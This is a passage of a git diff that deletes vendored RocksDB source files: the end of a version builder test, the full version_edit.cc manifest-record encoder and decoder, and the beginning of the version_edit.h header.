-  Add(0, 88U, "201", "300", 100U, 0, 100U, 100U, 0, 0, false, 100U, 100U);
-
-  Add(4, 6U, "150", "179", 100U);
-  Add(4, 7U, "180", "220", 100U);
-  Add(4, 8U, "221", "300", 100U);
-
-  Add(5, 26U, "150", "170", 100U);
-  Add(5, 27U, "171", "179", 100U);
-  UpdateVersionStorageInfo();
-
-  VersionEdit version_edit;
-  version_edit.AddFile(3, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.DeleteFile(0, 1U);
-  version_edit.DeleteFile(0, 88U);
-
-  EnvOptions env_options;
-
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-  version_builder.Apply(&version_edit);
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(0U, new_vstorage.NumLevelBytes(0));
-  ASSERT_EQ(100U, new_vstorage.NumLevelBytes(3));
-  ASSERT_EQ(300U, new_vstorage.NumLevelBytes(4));
-  ASSERT_EQ(200U, new_vstorage.NumLevelBytes(5));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, ApplyAndSaveToDynamic2) {
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-
-  Add(0, 1U, "150", "200", 100U, 0, 200U, 200U, 0, 0, false, 200U, 200U);
-  Add(0, 88U, "201", "300", 100U, 0, 100U, 100U, 0, 0, false, 100U, 100U);
-
-  Add(4, 6U, "150", "179", 100U);
-  Add(4, 7U, "180", "220", 100U);
-  Add(4, 8U, "221", "300", 100U);
-
-  Add(5, 26U, "150", "170", 100U);
-  Add(5, 27U, "171", "179", 100U);
-  UpdateVersionStorageInfo();
-
-  VersionEdit version_edit;
-  version_edit.AddFile(4, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.DeleteFile(0, 1U);
-  version_edit.DeleteFile(0, 88U);
-  version_edit.DeleteFile(4, 6U);
-  version_edit.DeleteFile(4, 7U);
-  version_edit.DeleteFile(4, 8U);
-
-  EnvOptions env_options;
-
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-  version_builder.Apply(&version_edit);
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(0U, new_vstorage.NumLevelBytes(0));
-  ASSERT_EQ(100U, new_vstorage.NumLevelBytes(4));
-  ASSERT_EQ(200U, new_vstorage.NumLevelBytes(5));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, ApplyMultipleAndSaveTo) {
-  UpdateVersionStorageInfo();
-
-  VersionEdit version_edit;
-  version_edit.AddFile(2, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.AddFile(2, 676, 0, 100U, GetInternalKey("401"),
-                       GetInternalKey("450"), 200, 200, false);
-  version_edit.AddFile(2, 636, 0, 100U, GetInternalKey("601"),
-                       GetInternalKey("650"), 200, 200, false);
-  version_edit.AddFile(2, 616, 0, 100U, GetInternalKey("501"),
-                       GetInternalKey("550"), 200, 200, false);
-  version_edit.AddFile(2, 606, 0, 100U, GetInternalKey("701"),
-                       GetInternalKey("750"), 200, 200, false);
-
-  EnvOptions env_options;
-
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-  version_builder.Apply(&version_edit);
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(500U, new_vstorage.NumLevelBytes(2));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, ApplyDeleteAndSaveTo) {
-  UpdateVersionStorageInfo();
-
-  EnvOptions env_options;
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-
-  VersionEdit version_edit;
-  version_edit.AddFile(2, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.AddFile(2, 676, 0, 100U, GetInternalKey("401"),
-                       GetInternalKey("450"), 200, 200, false);
-  version_edit.AddFile(2, 636, 0, 100U, GetInternalKey("601"),
-                       GetInternalKey("650"), 200, 200, false);
-  version_edit.AddFile(2, 616, 0, 100U, GetInternalKey("501"),
-                       GetInternalKey("550"), 200, 200, false);
-  version_edit.AddFile(2, 606, 0, 100U, GetInternalKey("701"),
-                       GetInternalKey("750"), 200, 200, false);
-  version_builder.Apply(&version_edit);
-
-  VersionEdit version_edit2;
-  version_edit.AddFile(2, 808, 0, 100U, GetInternalKey("901"),
-                       GetInternalKey("950"), 200, 200, false);
-  version_edit2.DeleteFile(2, 616);
-  version_edit2.DeleteFile(2, 636);
-  version_edit.AddFile(2, 806, 0, 100U, GetInternalKey("801"),
-                       GetInternalKey("850"), 200, 200, false);
-  version_builder.Apply(&version_edit2);
-
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(300U, new_vstorage.NumLevelBytes(2));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, EstimatedActiveKeys) {
-  const uint32_t kTotalSamples = 20;
-  const uint32_t kNumLevels = 5;
-  const uint32_t kFilesPerLevel = 8;
-  const uint32_t kNumFiles = kNumLevels * kFilesPerLevel;
-  const uint32_t kEntriesPerFile = 1000;
-  const uint32_t kDeletionsPerFile = 100;
-  for (uint32_t i = 0; i < kNumFiles; ++i) {
-    Add(static_cast<int>(i / kFilesPerLevel), i + 1,
-        ToString((i + 100) * 1000).c_str(),
-        ToString((i + 100) * 1000 + 999).c_str(),
-        100U,  0, 100, 100,
-        kEntriesPerFile, kDeletionsPerFile,
-        (i < kTotalSamples));
-  }
-  // minus 2X for the number of deletion entries because:
-  // 1x for deletion entry does not count as a data entry.
-  // 1x for each deletion entry will actually remove one data entry.
-  ASSERT_EQ(vstorage_.GetEstimatedActiveKeys(),
-            (kEntriesPerFile - 2 * kDeletionsPerFile) * kNumFiles);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/version_edit.cc b/thirdparty/rocksdb/db/version_edit.cc
deleted file mode 100644
index b01f7bb..0000000
--- a/thirdparty/rocksdb/db/version_edit.cc
+++ /dev/null
@@ -1,591 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_edit.h"
-
-#include "db/version_set.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/event_logger.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// Tag numbers for serialized VersionEdit.  These numbers are written to
-// disk and should not be changed.
-enum Tag {
-  kComparator = 1,
-  kLogNumber = 2,
-  kNextFileNumber = 3,
-  kLastSequence = 4,
-  kCompactPointer = 5,
-  kDeletedFile = 6,
-  kNewFile = 7,
-  // 8 was used for large value refs
-  kPrevLogNumber = 9,
-
-  // these are new formats divergent from open source leveldb
-  kNewFile2 = 100,
-  kNewFile3 = 102,
-  kNewFile4 = 103,      // 4th (the latest) format version of adding files
-  kColumnFamily = 200,  // specify column family for version edit
-  kColumnFamilyAdd = 201,
-  kColumnFamilyDrop = 202,
-  kMaxColumnFamily = 203,
-};
-
-enum CustomTag {
-  kTerminate = 1,  // The end of customized fields
-  kNeedCompaction = 2,
-  kPathId = 65,
-};
-// If this bit for the custom tag is set, opening DB should fail if
-// we don't know this field.
-uint32_t kCustomTagNonSafeIgnoreMask = 1 << 6;
-
-uint64_t PackFileNumberAndPathId(uint64_t number, uint64_t path_id) {
-  assert(number <= kFileNumberMask);
-  return number | (path_id * (kFileNumberMask + 1));
-}
-
-void VersionEdit::Clear() {
-  comparator_.clear();
-  max_level_ = 0;
-  log_number_ = 0;
-  prev_log_number_ = 0;
-  last_sequence_ = 0;
-  next_file_number_ = 0;
-  max_column_family_ = 0;
-  has_comparator_ = false;
-  has_log_number_ = false;
-  has_prev_log_number_ = false;
-  has_next_file_number_ = false;
-  has_last_sequence_ = false;
-  has_max_column_family_ = false;
-  deleted_files_.clear();
-  new_files_.clear();
-  column_family_ = 0;
-  is_column_family_add_ = 0;
-  is_column_family_drop_ = 0;
-  column_family_name_.clear();
-}
-
-bool VersionEdit::EncodeTo(std::string* dst) const {
-  if (has_comparator_) {
-    PutVarint32(dst, kComparator);
-    PutLengthPrefixedSlice(dst, comparator_);
-  }
-  if (has_log_number_) {
-    PutVarint32Varint64(dst, kLogNumber, log_number_);
-  }
-  if (has_prev_log_number_) {
-    PutVarint32Varint64(dst, kPrevLogNumber, prev_log_number_);
-  }
-  if (has_next_file_number_) {
-    PutVarint32Varint64(dst, kNextFileNumber, next_file_number_);
-  }
-  if (has_last_sequence_) {
-    PutVarint32Varint64(dst, kLastSequence, last_sequence_);
-  }
-  if (has_max_column_family_) {
-    PutVarint32Varint32(dst, kMaxColumnFamily, max_column_family_);
-  }
-
-  for (const auto& deleted : deleted_files_) {
-    PutVarint32Varint32Varint64(dst, kDeletedFile, deleted.first /* level */,
-                                deleted.second /* file number */);
-  }
-
-  for (size_t i = 0; i < new_files_.size(); i++) {
-    const FileMetaData& f = new_files_[i].second;
-    if (!f.smallest.Valid() || !f.largest.Valid()) {
-      return false;
-    }
-    bool has_customized_fields = false;
-    if (f.marked_for_compaction) {
-      PutVarint32(dst, kNewFile4);
-      has_customized_fields = true;
-    } else if (f.fd.GetPathId() == 0) {
-      // Use older format to make sure user can roll back the build if they
-      // don't config multiple DB paths.
-      PutVarint32(dst, kNewFile2);
-    } else {
-      PutVarint32(dst, kNewFile3);
-    }
-    PutVarint32Varint64(dst, new_files_[i].first /* level */, f.fd.GetNumber());
-    if (f.fd.GetPathId() != 0 && !has_customized_fields) {
-      // kNewFile3
-      PutVarint32(dst, f.fd.GetPathId());
-    }
-    PutVarint64(dst, f.fd.GetFileSize());
-    PutLengthPrefixedSlice(dst, f.smallest.Encode());
-    PutLengthPrefixedSlice(dst, f.largest.Encode());
-    PutVarint64Varint64(dst, f.smallest_seqno, f.largest_seqno);
-    if (has_customized_fields) {
-      // Customized fields' format:
-      // +-----------------------------+
-      // | 1st field's tag (varint32)  |
-      // +-----------------------------+
-      // | 1st field's size (varint32) |
-      // +-----------------------------+
-      // |    bytes for 1st field      |
-      // |  (based on size decoded)    |
-      // +-----------------------------+
-      // |                             |
-      // |          ......             |
-      // |                             |
-      // +-----------------------------+
-      // | last field's size (varint32)|
-      // +-----------------------------+
-      // |    bytes for last field     |
-      // |  (based on size decoded)    |
-      // +-----------------------------+
-      // | terminating tag (varint32)  |
-      // +-----------------------------+
-      //
-      // Customized encoding for fields:
-      //   tag kPathId: 1 byte as path_id
-      //   tag kNeedCompaction:
-      //        now only can take one char value 1 indicating need-compaction
-      //
-      if (f.fd.GetPathId() != 0) {
-        PutVarint32(dst, CustomTag::kPathId);
-        char p = static_cast<char>(f.fd.GetPathId());
-        PutLengthPrefixedSlice(dst, Slice(&p, 1));
-      }
-      if (f.marked_for_compaction) {
-        PutVarint32(dst, CustomTag::kNeedCompaction);
-        char p = static_cast<char>(1);
-        PutLengthPrefixedSlice(dst, Slice(&p, 1));
-      }
-      TEST_SYNC_POINT_CALLBACK("VersionEdit::EncodeTo:NewFile4:CustomizeFields",
-                               dst);
-
-      PutVarint32(dst, CustomTag::kTerminate);
-    }
-  }
-
-  // 0 is default and does not need to be explicitly written
-  if (column_family_ != 0) {
-    PutVarint32Varint32(dst, kColumnFamily, column_family_);
-  }
-
-  if (is_column_family_add_) {
-    PutVarint32(dst, kColumnFamilyAdd);
-    PutLengthPrefixedSlice(dst, Slice(column_family_name_));
-  }
-
-  if (is_column_family_drop_) {
-    PutVarint32(dst, kColumnFamilyDrop);
-  }
-  return true;
-}
-
-static bool GetInternalKey(Slice* input, InternalKey* dst) {
-  Slice str;
-  if (GetLengthPrefixedSlice(input, &str)) {
-    dst->DecodeFrom(str);
-    return dst->Valid();
-  } else {
-    return false;
-  }
-}
-
-bool VersionEdit::GetLevel(Slice* input, int* level, const char** msg) {
-  uint32_t v;
-  if (GetVarint32(input, &v)) {
-    *level = v;
-    if (max_level_ < *level) {
-      max_level_ = *level;
-    }
-    return true;
-  } else {
-    return false;
-  }
-}
-
-const char* VersionEdit::DecodeNewFile4From(Slice* input) {
-  const char* msg = nullptr;
-  int level;
-  FileMetaData f;
-  uint64_t number;
-  uint32_t path_id = 0;
-  uint64_t file_size;
-  if (GetLevel(input, &level, &msg) && GetVarint64(input, &number) &&
-      GetVarint64(input, &file_size) && GetInternalKey(input, &f.smallest) &&
-      GetInternalKey(input, &f.largest) &&
-      GetVarint64(input, &f.smallest_seqno) &&
-      GetVarint64(input, &f.largest_seqno)) {
-    // See comments in VersionEdit::EncodeTo() for format of customized fields
-    while (true) {
-      uint32_t custom_tag;
-      Slice field;
-      if (!GetVarint32(input, &custom_tag)) {
-        return "new-file4 custom field";
-      }
-      if (custom_tag == kTerminate) {
-        break;
-      }
-      if (!GetLengthPrefixedSlice(input, &field)) {
-        return "new-file4 custom field lenth prefixed slice error";
-      }
-      switch (custom_tag) {
-        case kPathId:
-          if (field.size() != 1) {
-            return "path_id field wrong size";
-          }
-          path_id = field[0];
-          if (path_id > 3) {
-            return "path_id wrong vaue";
-          }
-          break;
-        case kNeedCompaction:
-          if (field.size() != 1) {
-            return "need_compaction field wrong size";
-          }
-          f.marked_for_compaction = (field[0] == 1);
-          break;
-        default:
-          if ((custom_tag & kCustomTagNonSafeIgnoreMask) != 0) {
-            // Should not proceed if cannot understand it
-            return "new-file4 custom field not supported";
-          }
-          break;
-      }
-    }
-  } else {
-    return "new-file4 entry";
-  }
-  f.fd = FileDescriptor(number, path_id, file_size);
-  new_files_.push_back(std::make_pair(level, f));
-  return nullptr;
-}
-
-Status VersionEdit::DecodeFrom(const Slice& src) {
-  Clear();
-  Slice input = src;
-  const char* msg = nullptr;
-  uint32_t tag;
-
-  // Temporary storage for parsing
-  int level;
-  FileMetaData f;
-  Slice str;
-  InternalKey key;
-
-  while (msg == nullptr && GetVarint32(&input, &tag)) {
-    switch (tag) {
-      case kComparator:
-        if (GetLengthPrefixedSlice(&input, &str)) {
-          comparator_ = str.ToString();
-          has_comparator_ = true;
-        } else {
-          msg = "comparator name";
-        }
-        break;
-
-      case kLogNumber:
-        if (GetVarint64(&input, &log_number_)) {
-          has_log_number_ = true;
-        } else {
-          msg = "log number";
-        }
-        break;
-
-      case kPrevLogNumber:
-        if (GetVarint64(&input, &prev_log_number_)) {
-          has_prev_log_number_ = true;
-        } else {
-          msg = "previous log number";
-        }
-        break;
-
-      case kNextFileNumber:
-        if (GetVarint64(&input, &next_file_number_)) {
-          has_next_file_number_ = true;
-        } else {
-          msg = "next file number";
-        }
-        break;
-
-      case kLastSequence:
-        if (GetVarint64(&input, &last_sequence_)) {
-          has_last_sequence_ = true;
-        } else {
-          msg = "last sequence number";
-        }
-        break;
-
-      case kMaxColumnFamily:
-        if (GetVarint32(&input, &max_column_family_)) {
-          has_max_column_family_ = true;
-        } else {
-          msg = "max column family";
-        }
-        break;
-
-      case kCompactPointer:
-        if (GetLevel(&input, &level, &msg) &&
-            GetInternalKey(&input, &key)) {
-          // we don't use compact pointers anymore,
-          // but we should not fail if they are still
-          // in manifest
-        } else {
-          if (!msg) {
-            msg = "compaction pointer";
-          }
-        }
-        break;
-
-      case kDeletedFile: {
-        uint64_t number;
-        if (GetLevel(&input, &level, &msg) && GetVarint64(&input, &number)) {
-          deleted_files_.insert(std::make_pair(level, number));
-        } else {
-          if (!msg) {
-            msg = "deleted file";
-          }
-        }
-        break;
-      }
-
-      case kNewFile: {
-        uint64_t number;
-        uint64_t file_size;
-        if (GetLevel(&input, &level, &msg) && GetVarint64(&input, &number) &&
-            GetVarint64(&input, &file_size) &&
-            GetInternalKey(&input, &f.smallest) &&
-            GetInternalKey(&input, &f.largest)) {
-          f.fd = FileDescriptor(number, 0, file_size);
-          new_files_.push_back(std::make_pair(level, f));
-        } else {
-          if (!msg) {
-            msg = "new-file entry";
-          }
-        }
-        break;
-      }
-      case kNewFile2: {
-        uint64_t number;
-        uint64_t file_size;
-        if (GetLevel(&input, &level, &msg) && GetVarint64(&input, &number) &&
-            GetVarint64(&input, &file_size) &&
-            GetInternalKey(&input, &f.smallest) &&
-            GetInternalKey(&input, &f.largest) &&
-            GetVarint64(&input, &f.smallest_seqno) &&
-            GetVarint64(&input, &f.largest_seqno)) {
-          f.fd = FileDescriptor(number, 0, file_size);
-          new_files_.push_back(std::make_pair(level, f));
-        } else {
-          if (!msg) {
-            msg = "new-file2 entry";
-          }
-        }
-        break;
-      }
-
-      case kNewFile3: {
-        uint64_t number;
-        uint32_t path_id;
-        uint64_t file_size;
-        if (GetLevel(&input, &level, &msg) && GetVarint64(&input, &number) &&
-            GetVarint32(&input, &path_id) && GetVarint64(&input, &file_size) &&
-            GetInternalKey(&input, &f.smallest) &&
-            GetInternalKey(&input, &f.largest) &&
-            GetVarint64(&input, &f.smallest_seqno) &&
-            GetVarint64(&input, &f.largest_seqno)) {
-          f.fd = FileDescriptor(number, path_id, file_size);
-          new_files_.push_back(std::make_pair(level, f));
-        } else {
-          if (!msg) {
-            msg = "new-file3 entry";
-          }
-        }
-        break;
-      }
-
-      case kNewFile4: {
-        msg = DecodeNewFile4From(&input);
-        break;
-      }
-
-      case kColumnFamily:
-        if (!GetVarint32(&input, &column_family_)) {
-          if (!msg) {
-            msg = "set column family id";
-          }
-        }
-        break;
-
-      case kColumnFamilyAdd:
-        if (GetLengthPrefixedSlice(&input, &str)) {
-          is_column_family_add_ = true;
-          column_family_name_ = str.ToString();
-        } else {
-          if (!msg) {
-            msg = "column family add";
-          }
-        }
-        break;
-
-      case kColumnFamilyDrop:
-        is_column_family_drop_ = true;
-        break;
-
-      default:
-        msg = "unknown tag";
-        break;
-    }
-  }
-
-  if (msg == nullptr && !input.empty()) {
-    msg = "invalid tag";
-  }
-
-  Status result;
-  if (msg != nullptr) {
-    result = Status::Corruption("VersionEdit", msg);
-  }
-  return result;
-}
-
-std::string VersionEdit::DebugString(bool hex_key) const {
-  std::string r;
-  r.append("VersionEdit {");
-  if (has_comparator_) {
-    r.append("\n  Comparator: ");
-    r.append(comparator_);
-  }
-  if (has_log_number_) {
-    r.append("\n  LogNumber: ");
-    AppendNumberTo(&r, log_number_);
-  }
-  if (has_prev_log_number_) {
-    r.append("\n  PrevLogNumber: ");
-    AppendNumberTo(&r, prev_log_number_);
-  }
-  if (has_next_file_number_) {
-    r.append("\n  NextFileNumber: ");
-    AppendNumberTo(&r, next_file_number_);
-  }
-  if (has_last_sequence_) {
-    r.append("\n  LastSeq: ");
-    AppendNumberTo(&r, last_sequence_);
-  }
-  for (DeletedFileSet::const_iterator iter = deleted_files_.begin();
-       iter != deleted_files_.end();
-       ++iter) {
-    r.append("\n  DeleteFile: ");
-    AppendNumberTo(&r, iter->first);
-    r.append(" ");
-    AppendNumberTo(&r, iter->second);
-  }
-  for (size_t i = 0; i < new_files_.size(); i++) {
-    const FileMetaData& f = new_files_[i].second;
-    r.append("\n  AddFile: ");
-    AppendNumberTo(&r, new_files_[i].first);
-    r.append(" ");
-    AppendNumberTo(&r, f.fd.GetNumber());
-    r.append(" ");
-    AppendNumberTo(&r, f.fd.GetFileSize());
-    r.append(" ");
-    r.append(f.smallest.DebugString(hex_key));
-    r.append(" .. ");
-    r.append(f.largest.DebugString(hex_key));
-  }
-  r.append("\n  ColumnFamily: ");
-  AppendNumberTo(&r, column_family_);
-  if (is_column_family_add_) {
-    r.append("\n  ColumnFamilyAdd: ");
-    r.append(column_family_name_);
-  }
-  if (is_column_family_drop_) {
-    r.append("\n  ColumnFamilyDrop");
-  }
-  if (has_max_column_family_) {
-    r.append("\n  MaxColumnFamily: ");
-    AppendNumberTo(&r, max_column_family_);
-  }
-  r.append("\n}\n");
-  return r;
-}
-
-std::string VersionEdit::DebugJSON(int edit_num, bool hex_key) const {
-  JSONWriter jw;
-  jw << "EditNumber" << edit_num;
-
-  if (has_comparator_) {
-    jw << "Comparator" << comparator_;
-  }
-  if (has_log_number_) {
-    jw << "LogNumber" << log_number_;
-  }
-  if (has_prev_log_number_) {
-    jw << "PrevLogNumber" << prev_log_number_;
-  }
-  if (has_next_file_number_) {
-    jw << "NextFileNumber" << next_file_number_;
-  }
-  if (has_last_sequence_) {
-    jw << "LastSeq" << last_sequence_;
-  }
-
-  if (!deleted_files_.empty()) {
-    jw << "DeletedFiles";
-    jw.StartArray();
-
-    for (DeletedFileSet::const_iterator iter = deleted_files_.begin();
-         iter != deleted_files_.end();
-         ++iter) {
-      jw.StartArrayedObject();
-      jw << "Level" << iter->first;
-      jw << "FileNumber" << iter->second;
-      jw.EndArrayedObject();
-    }
-
-    jw.EndArray();
-  }
-
-  if (!new_files_.empty()) {
-    jw << "AddedFiles";
-    jw.StartArray();
-
-    for (size_t i = 0; i < new_files_.size(); i++) {
-      jw.StartArrayedObject();
-      jw << "Level" << new_files_[i].first;
-      const FileMetaData& f = new_files_[i].second;
-      jw << "FileNumber" << f.fd.GetNumber();
-      jw << "FileSize" << f.fd.GetFileSize();
-      jw << "SmallestIKey" << f.smallest.DebugString(hex_key);
-      jw << "LargestIKey" << f.largest.DebugString(hex_key);
-      jw.EndArrayedObject();
-    }
-
-    jw.EndArray();
-  }
-
-  jw << "ColumnFamily" << column_family_;
-
-  if (is_column_family_add_) {
-    jw << "ColumnFamilyAdd" << column_family_name_;
-  }
-  if (is_column_family_drop_) {
-    jw << "ColumnFamilyDrop" << column_family_name_;
-  }
-  if (has_max_column_family_) {
-    jw << "MaxColumnFamily" << max_column_family_;
-  }
-
-  jw.EndObject();
-
-  return jw.Get();
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_edit.h b/thirdparty/rocksdb/db/version_edit.h
deleted file mode 100644
index 47ebf5b..0000000
--- a/thirdparty/rocksdb/db/version_edit.h
+++ /dev/null
@@ -1,309 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <algorithm>
-#include <set>
-#include <utility>
-#include <vector>
-#include <string>
-#include "rocksdb/cache.h"
-#include "db/dbformat.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class VersionSet;
-
-const uint64_t kFileNumberMask = 0x3FFFFFFFFFFFFFFF;
-
-extern uint64_t PackFileNumberAndPathId(uint64_t number, uint64_t path_id);
-
-// A copyable structure contains information needed to read data from an SST
-// file. It can contains a pointer to a table reader opened for the file, or
-// file number and size, which can be used to create a new table reader for it.
-// The behavior is undefined when a copied of the structure is used when the
-// file is not in any live version any more.
-struct FileDescriptor {
-  // Table reader in table_reader_handle
-  TableReader* table_reader;
-  uint64_t packed_number_and_path_id;
-  uint64_t file_size;  // File size in bytes
-
-  FileDescriptor() : FileDescriptor(0, 0, 0) {}
-
-  FileDescriptor(uint64_t number, uint32_t path_id, uint64_t _file_size)
-      : table_reader(nullptr),
-        packed_number_and_path_id(PackFileNumberAndPathId(number, path_id)),
-        file_size(_file_size) {}
-
-  FileDescriptor& operator=(const FileDescriptor& fd) {
-    table_reader = fd.table_reader;
-    packed_number_and_path_id = fd.packed_number_and_path_id;
-    file_size = fd.file_size;
-    return *this;
-  }
-
-  uint64_t GetNumber() const {
-    return packed_number_and_path_id & kFileNumberMask;
-  }
-  uint32_t GetPathId() const {
-    return static_cast<uint32_t>(
-        packed_number_and_path_id / (kFileNumberMask + 1));
-  }
-  uint64_t GetFileSize() const { return file_size; }
-};
-
-struct FileSampledStats {
-  FileSampledStats() : num_reads_sampled(0) {}
-  FileSampledStats(const FileSampledStats& other) { *this = other; }
-  FileSampledStats& operator=(const FileSampledStats& other) {
-    num_reads_sampled = other.num_reads_sampled.load();
-    return *this;
-  }
-
-  // number of user reads to this file.
-  mutable std::atomic<uint64_t> num_reads_sampled;
-};
-
-struct FileMetaData {
-  FileDescriptor fd;
-  InternalKey smallest;            // Smallest internal key served by table
-  InternalKey largest;             // Largest internal key served by table
-  SequenceNumber smallest_seqno;   // The smallest seqno in this file
-  SequenceNumber largest_seqno;    // The largest seqno in this file
-
-  // Needs to be disposed when refs becomes 0.
-  Cache::Handle* table_reader_handle;
-
-  FileSampledStats stats;
-
-  // Stats for compensating deletion entries during compaction
-
-  // File size compensated by deletion entry.
-  // This is updated in Version::UpdateAccumulatedStats() first time when the
-  // file is created or loaded.  After it is updated (!= 0), it is immutable.
-  uint64_t compensated_file_size;
-  // These values can mutate, but they can only be read or written from
-  // single-threaded LogAndApply thread
-  uint64_t num_entries;            // the number of entries.
-  uint64_t num_deletions;          // the number of deletion entries.
-  uint64_t raw_key_size;           // total uncompressed key size.
-  uint64_t raw_value_size;         // total uncompressed value size.
-
-  int refs;  // Reference count
-
-  bool being_compacted;        // Is this file undergoing compaction?
-  bool init_stats_from_file;   // true if the data-entry stats of this file
-                               // has initialized from file.
-
-  bool marked_for_compaction;  // True if client asked us nicely to compact this
-                               // file.
-
-  FileMetaData()
-      : smallest_seqno(kMaxSequenceNumber),
-        largest_seqno(0),
-        table_reader_handle(nullptr),
-        compensated_file_size(0),
-        num_entries(0),
-        num_deletions(0),
-        raw_key_size(0),
-        raw_value_size(0),
-        refs(0),
-        being_compacted(false),
-        init_stats_from_file(false),
-        marked_for_compaction(false) {}
-
-  // REQUIRED: Keys must be given to the function in sorted order (it expects
-  // the last key to be the largest).
-  void UpdateBoundaries(const Slice& key, SequenceNumber seqno) {
-    if (smallest.size() == 0) {
-      smallest.DecodeFrom(key);
-    }
-    largest.DecodeFrom(key);
-    smallest_seqno = std::min(smallest_seqno, seqno);
-    largest_seqno = std::max(largest_seqno, seqno);
-  }
-};
-
-// A compressed copy of file meta data that just contain minimum data needed
-// to server read operations, while still keeping the pointer to full metadata
-// of the file in case it is needed.
-struct FdWithKeyRange {
-  FileDescriptor fd;
-  FileMetaData* file_metadata;  // Point to all metadata
-  Slice smallest_key;    // slice that contain smallest key
-  Slice largest_key;     // slice that contain largest key
-
-  FdWithKeyRange()
-      : fd(),
-        smallest_key(),
-        largest_key() {
-  }
-
-  FdWithKeyRange(FileDescriptor _fd, Slice _smallest_key, Slice _largest_key,
-                 FileMetaData* _file_metadata)
-      : fd(_fd),
-        file_metadata(_file_metadata),
-        smallest_key(_smallest_key),
-        largest_key(_largest_key) {}
-};
-
-// Data structure to store an array of FdWithKeyRange in one level
-// Actual data is guaranteed to be stored closely
-struct LevelFilesBrief {
-  size_t num_files;
-  FdWithKeyRange* files;
-  LevelFilesBrief() {
-    num_files = 0;
-    files = nullptr;
-  }
-};
-
-class VersionEdit {
- public:
-  VersionEdit() { Clear(); }
-  ~VersionEdit() { }
-
-  void Clear();
-
-  void SetComparatorName(const Slice& name) {
-    has_comparator_ = true;
-    comparator_ = name.ToString();
-  }
-  void SetLogNumber(uint64_t num) {
-    has_log_number_ = true;
-    log_number_ = num;
-  }
-  void SetPrevLogNumber(uint64_t num) {
-    has_prev_log_number_ = true;
-    prev_log_number_ = num;
-  }
-  void SetNextFile(uint64_t num) {
-    has_next_file_number_ = true;
-    next_file_number_ = num;
-  }
-  void SetLastSequence(SequenceNumber seq) {
-    has_last_sequence_ = true;
-    last_sequence_ = seq;
-  }
-  void SetMaxColumnFamily(uint32_t max_column_family) {
-    has_max_column_family_ = true;
-    max_column_family_ = max_column_family;
-  }
-
-  // Add the specified file at the specified number.
-  // REQUIRES: This version has not been saved (see VersionSet::SaveTo)
-  // REQUIRES: "smallest" and "largest" are smallest and largest keys in file
-  void AddFile(int level, uint64_t file, uint32_t file_path_id,
-               uint64_t file_size, const InternalKey& smallest,
-               const InternalKey& largest, const SequenceNumber& smallest_seqno,
-               const SequenceNumber& largest_seqno,
-               bool marked_for_compaction) {
-    assert(smallest_seqno <= largest_seqno);
-    FileMetaData f;
-    f.fd = FileDescriptor(file, file_path_id, file_size);
-    f.smallest = smallest;
-    f.largest = largest;
-    f.smallest_seqno = smallest_seqno;
-    f.largest_seqno = largest_seqno;
-    f.marked_for_compaction = marked_for_compaction;
-    new_files_.emplace_back(level, std::move(f));
-  }
-
-  void AddFile(int level, const FileMetaData& f) {
-    assert(f.smallest_seqno <= f.largest_seqno);
-    new_files_.emplace_back(level, f);
-  }
-
-  // Delete the specified "file" from the specified "level".
-  void DeleteFile(int level, uint64_t file) {
-    deleted_files_.insert({level, file});
-  }
-
-  // Number of edits
-  size_t NumEntries() { return new_files_.size() + deleted_files_.size(); }
-
-  bool IsColumnFamilyManipulation() {
-    return is_column_family_add_ || is_column_family_drop_;
-  }
-
